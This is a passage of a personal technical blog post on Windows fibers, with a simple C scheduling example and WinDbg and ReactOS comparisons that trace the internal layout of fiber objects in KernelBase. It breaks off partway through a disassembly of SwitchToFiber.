A Foray For Fun into Windows Fibers
The Windows fiber API has been described as one of the "most elegant" APIs available to the Windows programmer for manual execution scheduling.
I'm by no means an expert in how fibers work, nor how to deploy them into a large-scale application.
There is not a lot of documentation about how fibers work internally, so I thought it might be at least interesting or helpful to write about some of what I found.
0x00: About
"What is the Windows Fiber API?"
WELL, I'm very glad you asked. I mean, why else would you be here?
The Windows Fiber API exposes a means of manually "scheduling" execution within a process thread.
To quote MSDN:
"A fiber is a unit of execution that must be manually scheduled by the application. Fibers run in the context of the threads that schedule them. Each thread can schedule multiple fibers. In general, fibers do not provide advantages over a well-designed multithreaded application."
In regular terms, the Windows Fiber API provides developers with a means to manually schedule execution of many routines (converted to fibers) with a simple, lightweight API in one thread.
(Many Fibers, One Thread, Manually Switched)
A related API, User-Mode Scheduling (UMS), provides similar but more robust (read: complex) thread-based scheduling capabilities for developers.
(Many Threads, One Scheduler Routine)
While not the topic of this post, I found it relevant to call out because I think both APIs are pretty cool.
0x01: Intro
The example MSDN code is very nice, and can be located here.
For this much, MUCH simpler example, let's consider the following scenario:
We would like to create three routines HotPotatoOne, HotPotatoTwo, and HotPotatoThree.
Within one thread we want to schedule HotPotatoOne, HotPotatoTwo, and HotPotatoThree to "pass" each other a "potato" (unsigned int).
Each fiber will receive a pointer to that unsigned int, add its respective number to it, and switch to the next fiber:
HotPotatoOne adds 1
HotPotatoOne switches to HotPotatoTwo
HotPotatoTwo adds 2
HotPotatoTwo switches to HotPotatoThree
HotPotatoThree adds 3
HotPotatoThree switches to HotPotatoOne
We will call each routine in a loop until the number is greater than 1337.
A sane programmer would not use fibers for this.
Luckily, as an IT consultant, I lost my sanity a while ago.
Let's consider what we need to do in order to accomplish this task:
1. Convert the instantiating (main, in our case) thread to a fiber (ConvertThreadToFiber)
2. Create a fiber for each of the HotPotato routines (CreateFiber)
3. Pass a pointer to our starting number as the fiber data (the last argument to CreateFiber) and fetch it inside each fiber (GetFiberData)
4. Switch to each of the HotPotato fibers (SwitchToFiber)
5. Exit if the number is greater than 1337
Now, let's see how the code looks!
#include <Windows.h>
#include <stdio.h>
void __stdcall HotPotatoOne(LPVOID lpParam);
void __stdcall HotPotatoTwo(LPVOID lpParam);
void __stdcall HotPotatoThree(LPVOID lpParam);
#define FIBER_MAIN 0
#define FIBER_HP_ONE 1
#define FIBER_HP_TWO 2
#define FIBER_HP_THREE 3
unsigned int potato = 0;
LPVOID HOT_POTATOES[4] = { NULL, NULL, NULL, NULL };
int main() {
// Step 1
LPVOID AddrMainFiber = ConvertThreadToFiber(NULL);
// Step 2
LPVOID AddrHotPotatoOne = CreateFiber(0, (LPFIBER_START_ROUTINE)HotPotatoOne, &potato);
LPVOID AddrHotPotatoTwo = CreateFiber(0, (LPFIBER_START_ROUTINE)HotPotatoTwo, &potato);
LPVOID AddrHotPotatoThree = CreateFiber(0, (LPFIBER_START_ROUTINE)HotPotatoThree, &potato);
if (!(AddrMainFiber && AddrHotPotatoOne && AddrHotPotatoTwo && AddrHotPotatoThree)) {
puts("Couldn't create one of the fibers :(\nQuitting");
return 0;
}
HOT_POTATOES[FIBER_HP_ONE] = AddrHotPotatoOne;
HOT_POTATOES[FIBER_HP_TWO] = AddrHotPotatoTwo;
HOT_POTATOES[FIBER_HP_THREE] = AddrHotPotatoThree;
HOT_POTATOES[FIBER_MAIN] = AddrMainFiber;
// Step 4
SwitchToFiber(AddrHotPotatoOne);
DeleteFiber(HOT_POTATOES[FIBER_HP_ONE]);
DeleteFiber(HOT_POTATOES[FIBER_HP_TWO]);
DeleteFiber(HOT_POTATOES[FIBER_HP_THREE]);
// Calling DeleteFiber on the fiber we are currently running would exit the thread, so convert back instead
ConvertFiberToThread();
return 1;
}
void __stdcall HotPotatoOne(LPVOID lpParam) {
// Step 3
unsigned int* potato_local = (unsigned int*)GetFiberData();
do {
*potato_local += 1;
printf("Hot Potato One adds 1, potato is now %d!\n", *potato_local);
// Step 4
SwitchToFiber(HOT_POTATOES[FIBER_HP_TWO]);
} while (*potato_local < 1337); // Step 5
SwitchToFiber(HOT_POTATOES[FIBER_MAIN]);
}
void __stdcall HotPotatoTwo(LPVOID lpParam) {
// Step 3
unsigned int* potato_local = (unsigned int*)GetFiberData();
do {
*potato_local += 2;
printf("Hot Potato Two adds 2, potato is now %d!\n", *potato_local);
// Step 4
SwitchToFiber(HOT_POTATOES[FIBER_HP_THREE]);
} while (*potato_local < 1337); // Step 5
SwitchToFiber(HOT_POTATOES[FIBER_MAIN]);
}
void __stdcall HotPotatoThree(LPVOID lpParam) {
// Step 3
unsigned int* potato_local = (unsigned int*)GetFiberData();
do {
*potato_local += 3;
printf("Hot Potato Three adds 3, potato is now %d!\n", *potato_local);
// Step 4
SwitchToFiber(HOT_POTATOES[FIBER_HP_ONE]);
} while (*potato_local < 1337); // Step 5
SwitchToFiber(HOT_POTATOES[FIBER_MAIN]);
}
The output from this is as expected!
Hot Potato One adds 1, potato is now 1!
Hot Potato Two adds 2, potato is now 3!
Hot Potato Three adds 3, potato is now 6!
Hot Potato One adds 1, potato is now 7!
Hot Potato Two adds 2, potato is now 9!
. . .
TRUNCATED
. . .
Hot Potato Three adds 3, potato is now 1332!
Hot Potato One adds 1, potato is now 1333!
Hot Potato Two adds 2, potato is now 1335!
Hot Potato Three adds 3, potato is now 1338!
Looking at each fiber method, the avid reader might notice something really odd about how we're handling control flow.
Let's take a look at how we're *switching* to our HotPotato routines.
For example, the first function, HotPotatoOne:
void __stdcall HotPotatoOne(LPVOID lpParam) {
// Step 3
unsigned int* potato_local = (unsigned int*)GetFiberData();
do {
*potato_local += 1;
printf("Hot Potato One adds 1, potato is now %d!\n", *potato_local);
// Step 4
SwitchToFiber(HOT_POTATOES[FIBER_HP_TWO]);
} while (*potato_local < 1337); // Step 5
SwitchToFiber(HOT_POTATOES[FIBER_MAIN]);
}
After incrementing our potato, we switch to the next HotPotato function.
Seems intuitive.
So why the do/while and the SwitchToFiber back to the main fiber?
Consider an alternative function, BadHotPotatoOne:
void __stdcall BadHotPotatoOne(LPVOID lpParam) {
unsigned int* potato_local = (unsigned int*)GetFiberData();
*potato_local += 1;
printf("Hot Potato One adds 1, potato is now %d!\n", *potato_local);
SwitchToFiber(HOT_POTATOES[FIBER_HP_TWO]);
if(*potato_local > 1337){
SwitchToFiber(HOT_POTATOES[FIBER_MAIN]);
}
}
BadHotPotatoOne switches to HotPotatoTwo
HotPotatoTwo switches to HotPotatoThree
HotPotatoThree switches to BadHotPotatoOne
What happens next?
When HotPotatoThree calls SwitchToFiber back to BadHotPotatoOne, SwitchToFiber begins execution based on the next instruction of BadHotPotatoOne after the call to SwitchToFiber.
In this case, the next instruction following our return to BadHotPotatoOne is our if statement, not the beginning of our fiber.
void __stdcall BadHotPotatoOne(LPVOID lpParam) {
unsigned int* potato_local = (unsigned int*)GetFiberData();
*potato_local += 1;
printf("Hot Potato One adds 1, potato is now %d!\n", *potato_local);
SwitchToFiber(HOT_POTATOES[FIBER_HP_TWO]); // <- Switches to HotPotatoTwo, then HotPotatoThree, then -
if(*potato_local > 1337){ // <- Execution returns to the next statement when HotPotatoThree switches back
SwitchToFiber(HOT_POTATOES[FIBER_MAIN]);
}
}
As such we want to make sure our desired behavior of looping is the next instruction after our call to SwitchToFiber.
In our good function, HotPotatoOne, the next instruction is the "while" comparison, which jumps back to the top of the "do" loop and eventually switches to HotPotatoTwo again.
This way, when execution is switched back to HotPotatoOne from HotPotatoThree, we loop rather than return.
void __stdcall HotPotatoOne(LPVOID lpParam) {
// Step 3
unsigned int* potato_local = (unsigned int*)GetFiberData();
do {
*potato_local += 1;
printf("Hot Potato One adds 1, potato is now %d!\n", *potato_local);
// Step 4
SwitchToFiber(HOT_POTATOES[FIBER_HP_TWO]); // <- Switches to HotPotatoTwo, then HotPotatoThree, then -
} while (*potato_local < 1337); // <- Execution returns to the comparison, keeps looping until *potato_local >= 1337
SwitchToFiber(HOT_POTATOES[FIBER_MAIN]);
}
Neat.
0x02: Instantiation
The documentation is a lie.
No, seriously. Well. Kind of.
The MSDN documentation for CreateFiber and ConvertThreadToFiber tells us that the return value is the address of the fiber.
This is "true," but misleading as the "FIBER" structure is not documented.
I originally interpreted it as the base address of the routine I'm Converting into/Creating as a fiber.
The ACTUAL return value of these functions is a fiber object. (Object in a representative sense, not the type sense).
This data structure seems to be very similar to a thread's CONTEXT struct used in the Get/SetThreadContext functions.
Let's take a closer look into each function we called that returns an LPVOID fiber object (ConvertThreadToFiber, CreateFiber).
The fine folks at ReactOS have written an implementation of ConvertThreadToFiber/Ex.
Let's look at that source and compare it with the disassembly of KernelBase!ConvertThreadToFiber.
ReactOS ConvertThreadToFiberEx:
LPVOID
WINAPI
ConvertThreadToFiberEx(_In_opt_ LPVOID lpParameter,
_In_ DWORD dwFlags)
{
PTEB Teb;
PFIBER Fiber;
DPRINT1("Converting Thread to Fiber\n");
/* Check for invalid flags */
if (dwFlags & ~FIBER_FLAG_FLOAT_SWITCH)
{
/* Fail */
SetLastError(ERROR_INVALID_PARAMETER);
return NULL;
}
/* Are we already a fiber? */
Teb = NtCurrentTeb();
if (Teb->HasFiberData)
{
/* Fail */
SetLastError(ERROR_ALREADY_FIBER);
return NULL;
}
/* Allocate the fiber */
Fiber = RtlAllocateHeap(RtlGetProcessHeap(),
0,
sizeof(FIBER));
if (!Fiber)
{
/* Fail */
SetLastError(ERROR_NOT_ENOUGH_MEMORY);
return NULL;
}
. . .
TRUNCATED, boring shit I don't care about
. . .
/* Associate the fiber to the current thread */
Teb->NtTib.FiberData = Fiber;
Teb->HasFiberData = TRUE; // what we really care about
/* Return opaque fiber data */
return (LPVOID)Fiber; // MSDN says this is a pointer to the fiber, rather than the fiber object
// HMMMMMMM
}
Compare this with the disassembly of KernelBase!ConvertThreadToFiber:
KERNELBASE!ConvertThreadToFiber:
00007ffc`cdd58160 48895c2408 mov qword ptr [rsp+8], rbx ss:000000c4`533bf970={FiberBlog!_NULL_IMPORT_DESCRIPTOR (FiberBlog+0x22015) (00007ff6`49e62015)}
00007ffc`cdd58165 4889742410 mov qword ptr [rsp+10h], rsi
00007ffc`cdd5816a 57 push rdi
00007ffc`cdd5816b 4883ec20 sub rsp, 20h
00007ffc`cdd5816f 65488b3c2530000000 mov rdi, qword ptr gs:[30h]
; rdi gets a pointer to the current _NT_TIB
. . .
T R U N C A T E D
. . .
00007ffc`cdd58252 66838fee17000004 or word ptr [rdi+17EEh], 4
; Setting the Teb->HasFiberData flag to True
00007ffc`cdd5825a 48895720 mov qword ptr [rdi+20h], rdx
; Setting Teb->FiberData
00007ffc`cdd5825e 488b742438 mov rsi, qword ptr [rsp+38h]
00007ffc`cdd58263 488bc3 mov rax, rbx
00007ffc`cdd58266 488b5c2430 mov rbx, qword ptr [rsp+30h]
00007ffc`cdd5826b 4883c420 add rsp, 20h
00007ffc`cdd5826f 5f pop rdi
00007ffc`cdd58270 c3 ret
The behavior is, for all semantic purposes, identical. Thank you ReactOS team :)
So what's the deal with the TEB and TIB?
WELL, I'm glad you asked.
Let's take the two instructions from the disassembly and check to see what offsets they're referencing.
(rdi == TEB)
00007ffc`cdd58252 66838fee17000004 or word ptr [rdi+17EEh], 4
; Setting the Teb->HasFiberData flag to True
00007ffc`cdd5825a 48895720 mov qword ptr [rdi+20h], rdx
; Setting Teb->FiberData
Examining the TEB structure, we find that the WORD referenced by *(rdi+0x17ee) is actually a set of bit flags describing the state of the current thread.
0:000> dt nt!_TEB
ntdll!_TEB
+0x17ee SameTebFlags : Uint2B
+0x17ee SafeThunkCall : Pos 0, 1 Bit
+0x17ee InDebugPrint : Pos 1, 1 Bit
+0x17ee HasFiberData : Pos 2, 1 Bit ; "or word ptr [rdi+17EEh], 4" sets this to TRUE
+0x17ee SkipThreadAttach : Pos 3, 1 Bit
+0x17ee WerInShipAssertCode : Pos 4, 1 Bit
+0x17ee RanProcessInit : Pos 5, 1 Bit
+0x17ee ClonedThread : Pos 6, 1 Bit
+0x17ee SuppressDebugMsg : Pos 7, 1 Bit
+0x17ee DisableUserStackWalk : Pos 8, 1 Bit
+0x17ee RtlExceptionAttached : Pos 9, 1 Bit
+0x17ee InitialThread : Pos 10, 1 Bit
+0x17ee SessionAware : Pos 11, 1 Bit
+0x17ee LoadOwner : Pos 12, 1 Bit
+0x17ee LoaderWorker : Pos 13, 1 Bit
+0x17ee SkipLoaderInit : Pos 14, 1 Bit
+0x17ee SpareSameTebBits : Pos 15, 1 Bit
We can also see that the QWORD PTR referenced by *(rdi+0x20) is the FiberData pointer in the thread's TIB (the TIB is the first member of the TEB, so TEB+0x20 and TIB+0x20 are the same address).
0:000> dt nt!_NT_TIB
ntdll!_NT_TIB
+0x000 ExceptionList : Ptr64 _EXCEPTION_REGISTRATION_RECORD
+0x008 StackBase : Ptr64 Void
+0x010 StackLimit : Ptr64 Void
+0x018 SubSystemTib : Ptr64 Void
+0x020 FiberData : Ptr64 Void ; Pointer to the current fiber object; GetFiberData reads through it
+0x020 Version : Uint4B
+0x028 ArbitraryUserPointer : Ptr64 Void
+0x030 Self : Ptr64 _NT_TIB
Neat. So our FiberData pointer and HasFiberData flag both live in the TEB.
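One could define GetFiberData essentially as an intrinsic read of that TIB slot plus one dereference, since the slot holds a pointer to the current fiber object and the fiber data is that object's first field:
void* GetFiberData(){
#ifdef _WIN64
return *(void**)__readgsqword(0x20); // mov rax, gs:[20h] ; mov rax, [rax]
#else
return *(void**)__readfsdword(0x10); // mov eax, fs:[10h] ; mov eax, [eax]
#endif
}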
So how does CreateFiber store the instruction pointer of the function we desire?
Let's again go back to ReactOS for definition of CreateFiberEx (this time without truncation):
/*
* @implemented
*/
LPVOID
WINAPI
CreateFiberEx(_In_ SIZE_T dwStackCommitSize,
_In_ SIZE_T dwStackReserveSize,
_In_ DWORD dwFlags,
_In_ LPFIBER_START_ROUTINE lpStartAddress,
_In_opt_ LPVOID lpParameter)
{
PFIBER Fiber; // !! Note this
NTSTATUS Status;
INITIAL_TEB InitialTeb;
PACTIVATION_CONTEXT_STACK ActivationContextStackPointer;
DPRINT("Creating Fiber\n");
/* Check for invalid flags */
if (dwFlags & ~FIBER_FLAG_FLOAT_SWITCH)
{
/* Fail */
SetLastError(ERROR_INVALID_PARAMETER);
return NULL;
}
/* Allocate the Activation Context Stack */
ActivationContextStackPointer = NULL;
Status = RtlAllocateActivationContextStack(&ActivationContextStackPointer);
if (!NT_SUCCESS(Status))
{
/* Fail */
BaseSetLastNTError(Status);
return NULL;
}
/* Allocate the fiber */
Fiber = RtlAllocateHeap(RtlGetProcessHeap(),
0,
sizeof(FIBER));
if (!Fiber)
{
/* Free the activation context stack */
RtlFreeActivationContextStack(ActivationContextStackPointer);
/* Fail */
SetLastError(ERROR_NOT_ENOUGH_MEMORY);
return NULL;
}
/* Create the stack for the fiber */
Status = BaseCreateStack(NtCurrentProcess(),
dwStackCommitSize,
dwStackReserveSize,
&InitialTeb);
if (!NT_SUCCESS(Status))
{
/* Free the fiber */
RtlFreeHeap(GetProcessHeap(),
0,
Fiber);
/* Free the activation context stack */
RtlFreeActivationContextStack(ActivationContextStackPointer);
/* Failure */
BaseSetLastNTError(Status);
return NULL;
}
/* Clear the context */
RtlZeroMemory(&Fiber->FiberContext,
sizeof(CONTEXT));
/* Copy the data into the fiber */
Fiber->StackBase = InitialTeb.StackBase;
Fiber->StackLimit = InitialTeb.StackLimit;
Fiber->DeallocationStack = InitialTeb.AllocatedStackBase;
Fiber->FiberData = lpParameter;
Fiber->ExceptionList = EXCEPTION_CHAIN_END;
Fiber->GuaranteedStackBytes = 0;
Fiber->FlsData = NULL;
Fiber->ActivationContextStackPointer = ActivationContextStackPointer;
/* Save FPU State if requested, otherwise just the basic registers */
Fiber->FiberContext.ContextFlags = (dwFlags & FIBER_FLAG_FLOAT_SWITCH) ?
(CONTEXT_FULL | CONTEXT_FLOATING_POINT) :
CONTEXT_FULL;
/* Initialize the context for the fiber */
BaseInitializeContext(&Fiber->FiberContext, // AHA! We found the CONTEXT we were looking for!
lpParameter,
lpStartAddress,
InitialTeb.StackBase,
2);
/* Return the Fiber */
return Fiber;
}
Neat!
Now let's check KernelBase!CreateFiberEx to see that it works the same way:
TRIMMED FOR BREVITY
00007ffc`cdcf5511 48ff1598a31b00 call qword ptr [KERNELBASE!_imp_RtlAllocateHeap (00007ffc`cdeaf8b0)] ; Allocating the fiber object on the heap
00007ffc`cdcf5518 0f1f440000 nop dword ptr [rax+rax]
00007ffc`cdcf551d 488bf8 mov rdi, rax ; store its pointer in rdi
00007ffc`cdcf5520 4885c0 test rax, rax
00007ffc`cdcf5523 0f8418f80800 je KERNELBASE!CreateFiberEx+0x8f8b1 (00007ffc`cdd84d41)
00007ffc`cdcf5529 8b05c9682800 mov eax, dword ptr [KERNELBASE!SysInfo+0x18 (00007ffc`cdf7bdf8)]
00007ffc`cdcf552f 488d4dd0 lea rcx, [rbp-30h]
00007ffc`cdcf5533 448b0dae682800 mov r9d, dword ptr [KERNELBASE!SysInfo+0x8 (00007ffc`cdf7bde8)]
00007ffc`cdcf553a 4533c0 xor r8d, r8d
00007ffc`cdcf553d 48894c2428 mov qword ptr [rsp+28h], rcx
00007ffc`cdcf5542 488bd3 mov rdx, rbx
00007ffc`cdcf5545 498bcf mov rcx, r15
00007ffc`cdcf5548 4889442420 mov qword ptr [rsp+20h], rax
00007ffc`cdcf554d 48ff1524a01b00 call qword ptr [KERNELBASE!_imp_RtlCreateUserStack (00007ffc`cdeaf578)]
00007ffc`cdcf5554 0f1f440000 nop dword ptr [rax+rax]
00007ffc`cdcf5559 85c0 test eax, eax
00007ffc`cdcf555b 0f885ff80800 js KERNELBASE!CreateFiberEx+0x8f930 (00007ffc`cdd84dc0)
00007ffc`cdcf5561 33c0 xor eax, eax
00007ffc`cdcf5563 4c896dc8 mov qword ptr [rbp-38h], r13
00007ffc`cdcf5567 f3480f1ec8 rdsspq rax
00007ffc`cdcf556c 4885c0 test rax, rax
00007ffc`cdcf556f 0f8582f80800 jne KERNELBASE!CreateFiberEx+0x8f967 (00007ffc`cdd84df7)
00007ffc`cdcf5575 33d2 xor edx, edx
00007ffc`cdcf5577 488d4f30 lea rcx, [rdi+30h] ; The fiber object's CONTEXT sits at offset 0x30 from its base. Load that into rcx
00007ffc`cdcf557b 41b8d0040000 mov r8d, 4D0h
00007ffc`cdcf5581 e839c90800 call KERNELBASE!memset (00007ffc`cdd81ebf) ; Zero it
00007ffc`cdcf5586 488b5550 mov rdx, qword ptr [rbp+50h]
00007ffc`cdcf558a 488d4f30 lea rcx, [rdi+30h]
00007ffc`cdcf558e 488917 mov qword ptr [rdi], rdx ds:000002aa`f96b23a0=000002aaf96a0150
00007ffc`cdcf5591 4080e601 and sil, 1
00007ffc`cdcf5595 488b45e0 mov rax, qword ptr [rbp-20h]
00007ffc`cdcf5599 4d8bc4 mov r8, r12
00007ffc`cdcf559c 48894710 mov qword ptr [rdi+10h], rax
00007ffc`cdcf55a0 488b45e8 mov rax, qword ptr [rbp-18h]
00007ffc`cdcf55a4 48894718 mov qword ptr [rdi+18h], rax
00007ffc`cdcf55a8 488b45f0 mov rax, qword ptr [rbp-10h]
00007ffc`cdcf55ac 48834f08ff or qword ptr [rdi+8], 0FFFFFFFFFFFFFFFFh
00007ffc`cdcf55b1 48894720 mov qword ptr [rdi+20h], rax
00007ffc`cdcf55b5 4c89af00050000 mov qword ptr [rdi+500h], r13
00007ffc`cdcf55bc 4c89af10050000 mov qword ptr [rdi+510h], r13
00007ffc`cdcf55c3 4489af18050000 mov dword ptr [rdi+518h], r13d
00007ffc`cdcf55ca 664489af1c050000 mov word ptr [rdi+51Ch], r13w
00007ffc`cdcf55d2 488b45c0 mov rax, qword ptr [rbp-40h]
00007ffc`cdcf55d6 48898708050000 mov qword ptr [rdi+508h], rax
00007ffc`cdcf55dd 488b4710 mov rax, qword ptr [rdi+10h]
00007ffc`cdcf55e1 483305e0672800 xor rax, qword ptr [KERNELBASE!BasepFiberCookie (00007ffc`cdf7bdc8)]
00007ffc`cdcf55e8 4833c7 xor rax, rdi
00007ffc`cdcf55eb 4c89742420 mov qword ptr [rsp+20h], r14
00007ffc`cdcf55f0 48898720050000 mov qword ptr [rdi+520h], rax
00007ffc`cdcf55f7 40f6de neg sil
00007ffc`cdcf55fa 488b45c8 mov rax, qword ptr [rbp-38h]
00007ffc`cdcf55fe 48898728050000 mov qword ptr [rdi+528h], rax
00007ffc`cdcf5605 1bc0 sbb eax, eax
00007ffc`cdcf5607 2508001000 and eax, 100008h
00007ffc`cdcf560c 894760 mov dword ptr [rdi+60h], eax
00007ffc`cdcf560f 4c8b4de0 mov r9, qword ptr [rbp-20h]
00007ffc`cdcf5613 e828000000 call KERNELBASE!BaseInitializeFiberContext (00007ffc`cdcf5640) ; Initialize the CONTEXT with the created fiber's routine address
00007ffc`cdcf5618 488bc7 mov rax, rdi
00007ffc`cdcf561b 4c8d5c2470 lea r11, [rsp+70h]
00007ffc`cdcf5620 498b5b30 mov rbx, qword ptr [r11+30h]
00007ffc`cdcf5624 498b7338 mov rsi, qword ptr [r11+38h]
00007ffc`cdcf5628 498b7b40 mov rdi, qword ptr [r11+40h]
00007ffc`cdcf562c 498be3 mov rsp, r11
00007ffc`cdcf562f 415f pop r15
00007ffc`cdcf5631 415e pop r14
00007ffc`cdcf5633 415d pop r13
00007ffc`cdcf5635 415c pop r12
00007ffc`cdcf5637 5d pop rbp
00007ffc`cdcf5638 c3 ret
The BaseInitializeFiberContext function has two arguments that we care about in rcx and r8:
CONTEXT for the fiber, and LPFIBER_START_ROUTINE respectively.
By taking a look at the disassembly for BaseInitializeFiberContext, we can find out where exactly the real instruction pointer goes in the fiber object.
KERNELBASE!BaseInitializeFiberContext:
00007ffc`cdcf5640 48895c2408 mov qword ptr [rsp+8], rbx ss:000000c4`533bf890=0000000000001000
00007ffc`cdcf5645 48896c2410 mov qword ptr [rsp+10h], rbp
00007ffc`cdcf564a 4889742418 mov qword ptr [rsp+18h], rsi
00007ffc`cdcf564f 57 push rdi
00007ffc`cdcf5650 4883ec20 sub rsp, 20h
00007ffc`cdcf5654 498bf0 mov rsi, r8 ; rsi now holds LPFIBER_START_ROUTINE
00007ffc`cdcf5657 488bea mov rbp, rdx
00007ffc`cdcf565a 33d2 xor edx, edx
00007ffc`cdcf565c 41b8d0040000 mov r8d, 4D0h
00007ffc`cdcf5662 498bf9 mov rdi, r9
00007ffc`cdcf5665 488bd9 mov rbx, rcx ; rbx now holds CONTEXT for the fiber
00007ffc`cdcf5668 e852c80800 call KERNELBASE!memset (00007ffc`cdd81ebf)
00007ffc`cdcf566d c743300b001000 mov dword ptr [rbx+30h], 10000Bh
00007ffc`cdcf5674 65488b042560000000 mov rax, qword ptr gs:[60h]
00007ffc`cdcf567d f6400304 test byte ptr [rax+3], 4
00007ffc`cdcf5681 0f8499000000 je KERNELBASE!BaseInitializeFiberContext+0xe0 (00007ffc`cdcf5720)
00007ffc`cdcf5687 0f31 rdtsc
00007ffc`cdcf5689 8b0d59672800 mov ecx, dword ptr [KERNELBASE!SysInfo+0x8 (00007ffc`cdf7bde8)]
00007ffc`cdcf568f 48c1e220 shl rdx, 20h
00007ffc`cdcf5693 480bc2 or rax, rdx
00007ffc`cdcf5696 48c1e905 shr rcx, 5
00007ffc`cdcf569a 33d2 xor edx, edx
00007ffc`cdcf569c 48f7f1 div rax, rcx
00007ffc`cdcf569f 48c1e204 shl rdx, 4
00007ffc`cdcf56a3 b9801f0000 mov ecx, 1F80h
00007ffc`cdcf56a8 4889b380000000 mov qword ptr [rbx+80h], rsi ; AHA! We have found that the instruction pointer is at offset 0x80 from the CONTEXT
00007ffc`cdcf56af 488b742440 mov rsi, qword ptr [rsp+40h]
00007ffc`cdcf56b4 488d05d5d60600 lea rax, [KERNELBASE!BaseFiberStart (00007ffc`cdd62d90)]
00007ffc`cdcf56bb 48894378 mov qword ptr [rbx+78h], rax
00007ffc`cdcf56bf 482bfa sub rdi, rdx
00007ffc`cdcf56c2 894b34 mov dword ptr [rbx+34h], ecx
00007ffc`cdcf56c5 b87f020000 mov eax, 27Fh
00007ffc`cdcf56ca 898b18010000 mov dword ptr [rbx+118h], ecx
00007ffc`cdcf56d0 b92b000000 mov ecx, 2Bh
00007ffc`cdcf56d5 66898300010000 mov word ptr [rbx+100h], ax
00007ffc`cdcf56dc 66894b42 mov word ptr [rbx+42h], cx
00007ffc`cdcf56e0 4889ab88000000 mov qword ptr [rbx+88h], rbp
00007ffc`cdcf56e7 488b6c2438 mov rbp, qword ptr [rsp+38h]
00007ffc`cdcf56ec 8d4108 lea eax, [rcx+8]
00007ffc`cdcf56ef 66894338 mov word ptr [rbx+38h], ax
00007ffc`cdcf56f3 488d4fd0 lea rcx, [rdi-30h]
00007ffc`cdcf56f7 488b442450 mov rax, qword ptr [rsp+50h]
00007ffc`cdcf56fc c7433a2b002b00 mov dword ptr [rbx+3Ah], 2B002Bh
00007ffc`cdcf5703 c7433e53002b00 mov dword ptr [rbx+3Eh], 2B0053h
00007ffc`cdcf570a 48898b98000000 mov qword ptr [rbx+98h], rcx
00007ffc`cdcf5711 488b5c2430 mov rbx, qword ptr [rsp+30h]
00007ffc`cdcf5716 488901 mov qword ptr [rcx], rax
00007ffc`cdcf5719 4883c420 add rsp, 20h
00007ffc`cdcf571d 5f pop rdi
00007ffc`cdcf571e c3 ret
00007ffc`cdcf571f cc int 3
00007ffc`cdcf5720 33d2 xor edx, edx
00007ffc`cdcf5722 e97cffffff jmp KERNELBASE!BaseInitializeFiberContext+0x63 (00007ffc`cdcf56a3)
From all of this we can see the allocation of the FIBER struct, allocating/constructing the ActCtx and the stack, instantiating the CONTEXT for the fiber with the instruction pointer to our fiber routine!
Awesome!
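So the address of our fiber routine sits at offset 0x80 from the CONTEXT, which is itself at offset 0x30 from the fiber object, for a total offset of 0xB0. (In the x64 CONTEXT layout, 0x80 is the Rcx slot rather than Rip; the 0x78 slot just before it receives KERNELBASE!BaseFiberStart.)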
A quick definition of ReactOS' FIBER structure:
Note: This structure is not complete for replication in W10 20H2 x64 (not sure about others)
typedef struct _FIBER /* Field offsets: */
{ /* i386 arm x64 */
PVOID FiberData; /* 0x000 0x000 0x000 */
struct _EXCEPTION_REGISTRATION_RECORD *ExceptionList;/* 0x004 0x004 0x008 */
PVOID StackBase; /* 0x008 0x008 0x010 */
PVOID StackLimit; /* 0x00C 0x00C 0x018 */
PVOID DeallocationStack; /* 0x010 0x010 0x020 */
CONTEXT FiberContext; /* 0x014 0x018 0x030 */
#if (NTDDI_VERSION >= NTDDI_LONGHORN)
PVOID Wx86Tib; /* 0x2E0 0x1b8 0x500 */
struct _ACTIVATION_CONTEXT_STACK *ActivationContextStackPointer; /* 0x2E4 0x1bc 0x508 */
PVOID FlsData; /* 0x2E8 0x1c0 0x510 */
ULONG GuaranteedStackBytes; /* 0x2EC 0x1c4 0x518 */
ULONG TebFlags; /* 0x2F0 0x1c8 0x51C */
#else
ULONG GuaranteedStackBytes; /* 0x2E0 */
PVOID FlsData; /* 0x2E4 */
struct _ACTIVATION_CONTEXT_STACK *ActivationContextStackPointer;
#endif
} FIBER, *PFIBER;
Let's check out this CONTEXT within our LPVOID from CreateFiber to ensure the CONTEXT indeed has our HotPotatoOne address:
Immediately after our call to CreateFiber(0, HotPotatoOne, &potato)
0:000> u rip-6
FiberBlog!main+0x46 [Source.cpp @ 23]:
00007ff6`49e55d76 ff158cb20000 call qword ptr [FiberBlog!_imp_CreateFiber (00007ff6`49e61008)]
00007ff6`49e55d7c 48894528 mov qword ptr [rbp+28h],rax ; rip, rax contains fiber object
00007ff6`49e55d80 4c8d0589790000 lea r8,[FiberBlog!potato (00007ff6`49e5d710)]
00007ff6`49e55d87 488d1564b6ffff lea rdx,[FiberBlog!ILT+1005(?HotPotatoTwoYAXPEAXZ) (00007ff6`49e513f2)]
00007ff6`49e55d8e 33c9 xor ecx,ecx
00007ff6`49e55d90 ff1572b20000 call qword ptr [FiberBlog!_imp_CreateFiber (00007ff6`49e61008)]
00007ff6`49e55d96 48894548 mov qword ptr [rbp+48h],rax
00007ff6`49e55d9a 4c8d056f790000 lea r8,[FiberBlog!potato (00007ff6`49e5d710)]
check the LPVOID fiber object for our fiber's instruction pointer, rax + 0xB0
0:000> dq rax+0xb0 L1
000002aa`f96b2450 00007ff6`49e513f7
0:000> u poi(rax+0xb0)
FiberBlog!ILT+1010(?HotPotatoOneYAXPEAXZ):
00007ff6`49e513f7 e914460000 jmp FiberBlog!HotPotatoOne (00007ff6`49e55a10)
Nice! The fiber routine's instruction pointer is at the fiber object + 0xb0!
So far we've seen how to use them, how control flow works, a bit about how they're created, and now let's talk execution!
0x03: Execution
Looking back on our HotPotatoOne's control flow decisions, you may be wondering:
"How does switching work such that you needed the do/while?"
WELL, I'm glad you asked!
When one fiber switches to another via SwitchToFiber, the current execution context is saved into the outgoing fiber object's context structure, and the destination fiber's saved context is loaded in its place.
We can see in more detail as we look at the disassembly of KernelBase!SwitchToFiber:
KERNELBASE!SwitchToFiber:
00007ffc`cdd5acd0 4883ec28 sub rsp, 28h
00007ffc`cdd5acd4 65488b042530000000 mov rax, qword ptr gs:[30h]
00007ffc`cdd5acdd 483b4820 cmp rcx, qword ptr [rax+20h]
00007ffc`cdd5ace1 7420 je KERNELBASE!SwitchToFiber+0x33 (00007ffc`cdd5ad03)
00007ffc`cdd5ace3 488b4110 mov rax, qword ptr [rcx+10h]
00007ffc`cdd5ace7 483305da102200 xor rax, qword ptr [KERNELBASE!BasepFiberCookie (00007ffc`cdf7bdc8)]
00007ffc`cdd5acee 4833c1 xor rax, rcx
00007ffc`cdd5acf1 48398120050000 cmp qword ptr [rcx+520h], rax
